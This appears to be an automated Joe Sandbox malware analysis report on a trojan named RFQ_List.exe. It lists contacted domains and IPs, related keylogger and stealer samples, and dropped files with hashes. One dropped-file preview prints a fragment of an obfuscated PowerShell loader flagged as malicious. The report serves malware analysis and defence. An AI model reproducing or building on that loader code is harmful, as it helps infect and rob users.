                https://reallyfreegeoip.org/xml/msiexec.exe, 00000006.00000002.2678507251.00000000251AA000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                142.250.185.206
                drive.google.comUnited States
                15169GOOGLEUSfalse
                188.114.97.3
                reallyfreegeoip.orgEuropean Union
                13335CLOUDFLARENETUStrue
                158.101.44.242
                checkip.dyndns.comUnited States
                31898ORACLE-BMC-31898USfalse
                172.217.16.193
                drive.usercontent.google.comUnited States
                15169GOOGLEUSfalse
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1543566
                Start date and time:2024-10-28 06:45:03 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 7m 5s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:11
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:RFQ_List.exe
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@11/20@4/4
                EGA Information:
                • Successful, ratio: 33.3%
                HCA Information:
                • Successful, ratio: 95%
                • Number of executed functions: 155
                • Number of non-executed functions: 43
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target msiexec.exe, PID 5788 because it is empty
                • Execution Graph export aborted for target powershell.exe, PID 6840 because it is empty
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                TimeTypeDescription
                01:46:01API Interceptor38x Sleep call for process: powershell.exe modified
                01:47:20API Interceptor96x Sleep call for process: msiexec.exe modified
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                188.114.97.3PbfYaIvR5B.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                • windowsxp.top/ExternaltoPhppollcpuupdateTrafficpublic.php
                SR3JZpolPo.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                • xilloolli.com/api.php?status=1&wallets=0&av=1
                5Z1WFRMTOXRH6X21Z8NU8.exeGet hashmaliciousUnknownBrowse
                • artvisions-autoinsider.com/8bkjdSdfjCe/index.php
                PO 4800040256.exeGet hashmaliciousFormBookBrowse
                • www.cc101.pro/4hfb/
                QUOTATION_OCTQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                • filetransfer.io/data-package/cDXpxO66/download
                Instruction_1928.pdf.lnk.download.lnkGet hashmaliciousLummaCBrowse
                • tech-tribune.shop/pLQvfD4d5/index.php
                WBCDZ4Z3M2667YBDZ5K4.bin.exeGet hashmaliciousUnknownBrowse
                • tech-tribune.shop/pLQvfD4d5/index.php
                yGktPvplJn.exeGet hashmaliciousPushdoBrowse
                • www.rs-ag.com/
                https://is.gd/6NgVrQGet hashmaliciousHTMLPhisherBrowse
                • aa.opencompanies.co.uk/vEXJm/
                Comprobante de pago.xlam.xlsxGet hashmaliciousUnknownBrowse
                • paste.ee/d/KXy1F
                158.101.44.242z45paymentadvice.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                • checkip.dyndns.org/
                na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                • checkip.dyndns.org/
                na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                • checkip.dyndns.org/
                TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                • checkip.dyndns.org/
                dekont_001.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                • checkip.dyndns.org/
                New_Order_568330_Material_Specifications.exeGet hashmaliciousAgentTesla, MassLogger RAT, Phoenix Stealer, RedLine, SugarDump, XWormBrowse
                • checkip.dyndns.org/
                g1TLK7mbZD.imgGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                • checkip.dyndns.org/
                Renommxterne.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                • checkip.dyndns.org/
                InvoiceXCopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                • checkip.dyndns.org/
                CLOSURE.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                • checkip.dyndns.org/
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                reallyfreegeoip.orgz1RECONFIRMPAYMENTINVOICE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                • 188.114.96.3
                AWB#21138700102.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                • 188.114.96.3
                z45paymentadvice.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                • 188.114.97.3
                rFa24c148.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                • 188.114.96.3
                na.docGet hashmaliciousMassLogger RATBrowse
                • 188.114.96.3
                na.docGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                • 188.114.97.3
                na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                • 188.114.96.3
                na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                • 188.114.97.3
                mnobizxv.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                • 188.114.96.3
                TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                • 188.114.97.3
                checkip.dyndns.comz1RECONFIRMPAYMENTINVOICE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                • 132.226.247.73
                AWB#21138700102.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                • 132.226.8.169
                z45paymentadvice.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                • 158.101.44.242
                rFa24c148.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                • 193.122.6.168
                na.docGet hashmaliciousMassLogger RATBrowse
                • 193.122.130.0
                na.docGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                • 193.122.130.0
                na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                • 158.101.44.242
                na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                • 132.226.247.73
                mnobizxv.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                • 193.122.130.0
                TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                • 158.101.44.242
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                CLOUDFLARENETUSXWe8H4gRPb.exeGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                file.exeGet hashmaliciousLummaCBrowse
                • 172.67.170.64
                XWe8H4gRPb.exeGet hashmaliciousUnknownBrowse
                • 188.114.96.3
                z1RECONFIRMPAYMENTINVOICE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                • 188.114.96.3
                file.exeGet hashmaliciousLummaCBrowse
                • 172.67.170.64
                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                • 172.67.170.64
                file.exeGet hashmaliciousLummaCBrowse
                • 172.67.170.64
                AWB#21138700102.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                • 188.114.96.3
                file.exeGet hashmaliciousLummaCBrowse
                • 172.67.170.64
                z45paymentadvice.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                • 188.114.97.3
                ORACLE-BMC-31898USz45paymentadvice.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                • 158.101.44.242
                rFa24c148.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                • 193.122.6.168
                na.docGet hashmaliciousMassLogger RATBrowse
                • 193.122.130.0
                na.docGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                • 193.122.130.0
                na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                • 158.101.44.242
                na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                • 158.101.44.242
                mnobizxv.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                • 193.122.130.0
                la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                • 130.61.64.122
                TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                • 158.101.44.242
                JOSXXL1.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                • 193.122.130.0
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                54328bd36c14bd82ddaa0c04b25ed9adz1RECONFIRMPAYMENTINVOICE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                • 188.114.97.3
                AWB#21138700102.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                • 188.114.97.3
                z45paymentadvice.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                • 188.114.97.3
                rFa24c148.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                • 188.114.97.3
                TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                • 188.114.97.3
                JOSXXL1.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                • 188.114.97.3
                8m9f0jVE2G.exeGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                8m9f0jVE2G.exeGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                https://docs.google.com/drawings/d/1igp9x84Q_2r8qSa1YDSk9dpVvjHGWjRjQMSbSGGfj2M/preview?pli=1VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1BvGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                dekont_001.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                • 188.114.97.3
                37f463bf4616ecd445d4a1937da06e19rFa24c148.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                • 142.250.185.206
                • 172.217.16.193
                file.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWormBrowse
                • 142.250.185.206
                • 172.217.16.193
                file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                • 142.250.185.206
                • 172.217.16.193
                CQlUZ4KuAa.exeGet hashmaliciousVidarBrowse
                • 142.250.185.206
                • 172.217.16.193
                yt5xqAvHnZ.exeGet hashmaliciousVidarBrowse
                • 142.250.185.206
                • 172.217.16.193
                9yJSTTEg68.exeGet hashmaliciousVidarBrowse
                • 142.250.185.206
                • 172.217.16.193
                f6ffg1sZS2.exeGet hashmaliciousBabuk, DjvuBrowse
                • 142.250.185.206
                • 172.217.16.193
                17300406664afe7aec458893633a7734ab1b119dd638ebaf863f6f65e2e732ab9f2f071556149.dat-decoded.exeGet hashmaliciousZhark RATBrowse
                • 142.250.185.206
                • 172.217.16.193
                17300406664afe7aec458893633a7734ab1b119dd638ebaf863f6f65e2e732ab9f2f071556149.dat-decoded.exeGet hashmaliciousZhark RATBrowse
                • 142.250.185.206
                • 172.217.16.193
                wifipr.exeGet hashmaliciousUnknownBrowse
                • 142.250.185.206
                • 172.217.16.193
                No context
                Process:C:\Windows\SysWOW64\msiexec.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):1039
                Entropy (8bit):5.353332853270839
                Encrypted:false
                SSDEEP:24:ML9E4KiE4Ko84qXKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKiHKoviYHKh3oPtHo6hAHKzeR
                MD5:A4AF0F36EC4E0C69DC0F860C891E8BBE
                SHA1:28DD81A1EDDF71CBCBF86DA986E047279EF097CD
                SHA-256:B038D4342E4DD96217BD90CFE32581FCCB381C5C2E6FF257CD32854F840D1FDE
                SHA-512:A675D3E9DB5BDD325A22E82C6BCDBD5409D7A34453DAAEB0E37206BE982C388547E1BDF22DC70393C69D0CE55635E2364502572C3AD2E6753A56A5C3893F6D69
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e
                Process:C:\Users\user\Desktop\RFQ_List.exe
                File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                Category:dropped
                Size (bytes):821
                Entropy (8bit):3.07939173284978
                Encrypted:false
                SSDEEP:12:8wl0dRi/kdT0Bnn1recmmbll1recmERKQ1ooPiMolkKwDuu1l4C:8p4BnndnR9WAl4k1DfwC
                MD5:571C882640436E4C3A401B4CC3D25F7A
                SHA1:B779BB14B19DBC737898D8AC63BDB924CA596CEB
                SHA-256:4C82C5866B8EEC3D975CA718FFC158FA54970BF1F22F2BAF6AB8820571F3B805
                SHA-512:336F47FFD6E803912508F49C7DA27CAEF12CA8999DC7C0F9BD257F4C376B762DCC3E92D9924B8FB2123BB2FDC5A53C50295804D229F157C12BC6983E782B208B
                Malicious:false
                Reputation:low
                Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................b.1...........ProgramData.H............................................P.r.o.g.r.a.m.D.a.t.a.....h.1...........Polyhistorisk.L............................................P.o.l.y.h.i.s.t.o.r.i.s.k.......2...........fagbladsjournalistens.ugi.d............................................f.a.g.b.l.a.d.s.j.o.u.r.n.a.l.i.s.t.e.n.s...u.g.i...(...H.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m.D.a.t.a.\.P.o.l.y.h.i.s.t.o.r.i.s.k.\.f.a.g.b.l.a.d.s.j.o.u.r.n.a.l.i.s.t.e.n.s...u.g.i.e.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.e.r.i.t.o.n.e.a.l.i.z.i.n.g.\.n.o.m.a.d.e.i.n.v.a.s.i.o.n.e.r.s.\.s.t.o.f.h.a.n.d.s.k.e.r.n.e.s.\.M.i.c.r.o.b.i.o.s.i.s.\.D.r.i.f.t.e.r.n.e.s.....
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:modified
                Size (bytes):14744
                Entropy (8bit):4.992175361088568
                Encrypted:false
                SSDEEP:384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
                MD5:A35685B2B980F4BD3C6FD278EA661412
                SHA1:59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
                SHA-256:3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
                SHA-512:70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Users\user\Desktop\RFQ_List.exe
                File Type:ASCII text, with very long lines (3209), with CRLF, LF line terminators
                Category:dropped
                Size (bytes):53988
                Entropy (8bit):5.360834504404642
                Encrypted:false
                SSDEEP:768:vmhC4iu9gl9h6rLL44XFeko5AQ5JX61IB5w0w9g5OrVrd3dRnxLNEAka8l5Zowvm:vmsJjw744FYwgw0wSgZp0Aka8lHosvY7
                MD5:F80DE07A4CE30153F8406DB6A12AF56E
                SHA1:BBE21FA2D5C1C6F2CAD16333A3D095547F3426D2
                SHA-256:510D5A55E94D189AB5AFADB87A4FB0BE42220646E2B2CB470511C3055C0EEBA6
                SHA-512:248A69F2A9BA266D4A571646F2235F67833EDF425F3A0350BECD520CC941B556BCCD863EC8270DE81EE48DC91BCC8F5A9BC71E51A89FD4EED529C843F1E43428
                Malicious:true
                Preview:$Udvisningen=$Steward;..<#Umbiliciform Bughindernes Unistylist Scarifier #>..<#Familiariseres doloriferous forfinelsens Photochromography #>..<#Steuropiskes Cicada Forsorteringens thiostannite Diminutivets Fortegnsvariationerne krakens #>..<#Kridtstreg Adjudantsnoren Foxed Eyewash Tidsflgeplanernes Akvariefisken #>..<#Nonpraedial Jugoslaviensrejse Griddled #>..<#Clithe Nondemonstrativeness Smedningernes Hjerteligstes #>...$Herns = @'.One s. Qua.$Out.aGGlyceaSyntruBocaslBranclMis oiUdl.fsSymbomFo,ehealene=Forwe$trustFT,bueoUrotorBarnauOpgavd Brumsdevalek rboe Pe,slTandliSkrfngSpksttOuang; Tjen.ManerfFirmau,rintnRekticStr,kt.esini SaraoBenefnUdsug Non,lVKan iebakkea VulglAnkylsRaptukurteki Sj pnDisko3 For.6Tredi A.msw(Jclin$OkkulHH,ndeaThou.dVentelRgerneKodeny Fors,Cykel$TritevHartvaKategrDiploe SmuttcharmaUdbrigLyctueSognel orbrs Fr.teRigm,nCrim,)Braid Koaeu{Scutc. C,un.Testu$ Spa,O,redjv Ov.reKondirStr,ncG,ardh Defri Afsplnon xd Enwoi GaarsTe pthBackl Immun(UdannKFor.iaNed.rsKurs kBrnd
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                Category:dropped
                Size (bytes):927736
                Entropy (8bit):7.8603182914839635
                Encrypted:false
                SSDEEP:24576:dbusrIDaWLwBhB9XE/2D6lm7Pytae6/B1GX:SX8zB9XQ2gm7OjGB1GX
                MD5:27393AC93E0C60C934AFA5CCDFC7C529
                SHA1:E1989CE514EFD53819BE62E8AA4C51975DA0B3E0
                SHA-256:66F7CA7287B5118119D8E6B8D55222D7662DA16C12345A6122A28B64702AE69B
                SHA-512:672583E3937F3F5F5E84843913DA032D5F6D6D32C759758E37710DFF340973F9F0C77FB8F5B7B176B26EDDDEC5851AA4902DEB103B277B7403EA57D88292B438
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 67%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..NP..*_...P..s...P...V...P..Rich.P..........................PE..L......V.................d...........2............@..................................x....@.........................................................................................................................................................text...|c.......d.................. ..`.rdata..|............h..............@..@.data................~..............@....ndata.......P...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):26
                Entropy (8bit):3.95006375643621
                Encrypted:false
                SSDEEP:3:ggPYV:rPYV
                MD5:187F488E27DB4AF347237FE461A079AD
                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                Malicious:true
                Preview:[ZoneTransfer]....ZoneId=0
                Process:C:\Users\user\Desktop\RFQ_List.exe
                File Type:data
                Category:dropped
                Size (bytes):346239
                Entropy (8bit):1.256262494072881
                Encrypted:false
                SSDEEP:768:qYE4EutdtNCCqpy382u5rGwJOshbFbQlixw8Y6T58VWS1HGuP8kPA7cBBjEaqKJJ:BtZ5iUEABbp5d1eWZK0KUN
                MD5:BFE4500D057A2BCEB674FBE3BF3687B1
                SHA1:547D5412301FC11E8BB858D1B4C34D3457DF0F24
                SHA-256:9AE45133F71521E61777D1A3A507AADB6C3808588D0E7632A02D1EE0EAD48CA9
                SHA-512:F963F860CC7A4BAF89C726D738CA2B93227D77297AFB5BA70533C6E454B5D8DA81725745C97480DF2818D26CEB7F6443D30B0022BEFB3E9FF05DFB248BE0A5FB
                Malicious:false
                Preview:...~........................................................................O.........!.........................K.U........].........................Gz........................................j................\.................."..................N..............................................y.................r.........................2.............C....h..................h..................=......e..7.........~..............G...................................................e..................................2.............................................N....................I*............../..........................................................................w.........................................................y....................z.....................................L........Z.....................................G................................................o............................................'.................................5.........G.....i..........i......
                Process:C:\Users\user\Desktop\RFQ_List.exe
                File Type:data
                Category:dropped
                Size (bytes):400431
                Entropy (8bit):1.2528029962595542
                Encrypted:false
